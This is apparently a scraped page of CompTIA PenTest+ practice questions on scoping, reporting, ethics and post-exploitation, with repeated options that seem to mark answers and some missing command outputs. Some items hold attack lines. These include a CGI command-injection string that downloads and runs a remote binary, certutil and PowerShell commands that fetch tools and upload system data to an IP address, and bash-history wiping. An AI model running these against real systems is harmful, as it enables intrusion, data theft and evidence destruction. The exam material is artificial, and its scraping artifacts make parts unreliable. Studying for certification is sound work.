A compliance-based penetration test is primarily concerned with:

determining the efficacy of a specific set of security standards.

obtaining Pll from the protected network.

bypassing protection on edge devices.

determining the efficacy of a specific set of security standards.

obtaining specific information from the protected network.

A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel.Which of the following would the tester MOST likely describe as a benefit of the framework?

Understanding the tactics of a security intrusion can help disrupt them.

Scripts that are part of the framework can be imported directly into SIEM tools.

The methodology can be used to estimate the cost of an incident better.

The framework is static and ensures stability of a security program overtime.

A new client hired a penetration-testing company for a month-long contract for various security assessments against the client's new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings.Which of the following is most important for the penetration tester to define FIRST?

Establish the threshold of risk to escalate to the client immediately.

Establish the format required by the client.

Establish the threshold of risk to escalate to the client immediately.

Establish the method of potential false positives.

Establish the preferred day of the week for reporting.

Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

The existence of default passwords

Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised?

To remove the tester-created Mimikatz account

To remove hash-cracking registry entries

To remove the tester-created Mimikatz account

To remove tools from the server

To remove a reverse shell from the system

A penetration tester was brute forcing an internal web server and ran a command that produced the following output: However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed.Which of the following is the MOST likely reason for the lack of output?

The HTTP port is not open on the firewall.

The tester did not run sudo before the command.

The web server is using HTTPS instead of HTTP.

This URI returned a server error.

An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.Which of the following is the penetration tester trying to accomplish?

Limit invasiveness based on scope.

Uncover potential criminal activity based on the evidence gathered.

Identify all the vulnerabilities in the environment.

Limit invasiveness based on scope.

Maintain confidentiality of the findings.

A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.Which of the following is the BEST way to ensure this is a true positive?

Perform a manual test on the server.

Run another scanner to compare.

Perform a manual test on the server.

Check the results on the scanner.

Look for the vulnerability online.

A penetration tester ran the following commands on a Windows server: Which of the following should the tester do AFTER delivering the final report?

Remove the tester-created credentials.

Delete the scheduled batch job.

Close the reverse shell connection.

Downgrade the svsaccount permissions.

Remove the tester-created credentials.

A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.Which of the following describes the scope of the assessment?

Partially known environment testing

A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?

Ensure the client has signed the SOW.

Verify the client has granted network access to the hot site.

Determine if the failover environment relies on resources not owned by the client.

Establish communication and escalation procedures with the client.

Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:

devices may cause physical world effects.

devices produce more heat and consume more power.

devices are obsolete and are no longer available for replacement.

protocols are more difficult to understand.

devices may cause physical world effects.

A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

Controllers will not validate the origin of commands.

PLCs will not act upon commands injected over the network.

Supervisors and controllers are on a separate virtual network by default.

Controllers will not validate the origin of commands.

Supervisory systems will detect a malicious injection of code/commands.

A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?

The correct user accounts and associated passwords

The expected time frame of the assessment

The proper emergency contacts for the client

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions.Which of the following commands would help the tester START this process?

certutil -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe

powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')

schtasks /query /fo LIST /v | find /I "Next Run Time:"

wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe

A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:• The following request was intercepted going to the network device:GET /login HTTP/1.1Host: 10.50.100.16User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0Accept-Language: en-US,en;q=0.5Connection: keep-aliveAuthorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk• Network management interfaces are available on the production network.• An Nmap scan returned the following: Which of the following would be BEST to add to the recommendations section of the final report?(Choose two.)

Create an out-of-band network for management.

Implement a better method for authentication.

Enforce enhanced password complexity requirements.

Disable HTTP/301 redirect configuration.

Create an out-of-band network for management.

Implement a better method for authentication.

Eliminate network management and control interfaces.

A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?

Implement a recurring cybersecurity awareness education program for all users.

Implement multifactor authentication on all corporate applications.

Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.

Implement an email security gateway to block spam and malware from email communications.

A penetration tester is reviewing the following SOW prior to engaging with a client:"Network diagrams, logical and physical asset inventory, and employees' names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client's Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner." Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)

Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client's senior leadership team

Seeking help with the engagement in underground hacker forums by sharing the client's public IP address

Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection

Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement

Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client's senior leadership team

Seeking help with the engagement in underground hacker forums by sharing the client's public IP address

Using a software-based erase tool to wipe the client's findings from the penetration tester's laptop

Retaining the SOW within the penetration tester's company for future use so the sales team can plan future engagements

A penetration tester gains access to a system and establishes persistence, and then runs the following commands:cat /dev/null > temptouch -r .bash_history tempmv temp .bash_historyWhich of the following actions is the tester MOST likely performing?

Covering tracks by clearing the Bash history

Redirecting Bash history to /dev/null

Making a copy of the user's Bash history for further enumeration

Covering tracks by clearing the Bash history

Making decoy files on the system to confuse incident responders

A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?

Reach out to the primary point of contact

Call law enforcement officials immediately

Collect the proper evidence and add to the final report

A penetration-testing team is conducting a physical penetration test to gain entry to a building.Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

As proof in case they are discovered

As backup in case the original documents are lost

To guide them through the building entrances

To validate the billing information with the client

As proof in case they are discovered

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:exploit = "POST "exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a"exploit += "HTTP/1.1"Which of the following commands should the penetration tester run post-engagement?

grep -v apache ~/.bash_history > ~/.bash_history

CompTIA PT0-002 Practice Test 1 - Free Online Exam Prep & Questions

Question 1 / 40

A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.

Which of the following should the tester verify FIRST to assess this risk?

Whether sensitive client data is publicly accessible

Whether the connection between the cloud and the client is secure

Whether the client's employees are trained properly to use the platform

Whether the cloud applications were developed using a secure SDLC

Comment (0)

CompTIA PT0-002 Practice Test 1

Question

CompTIA PT0-002 Practice Tests

Practice Tests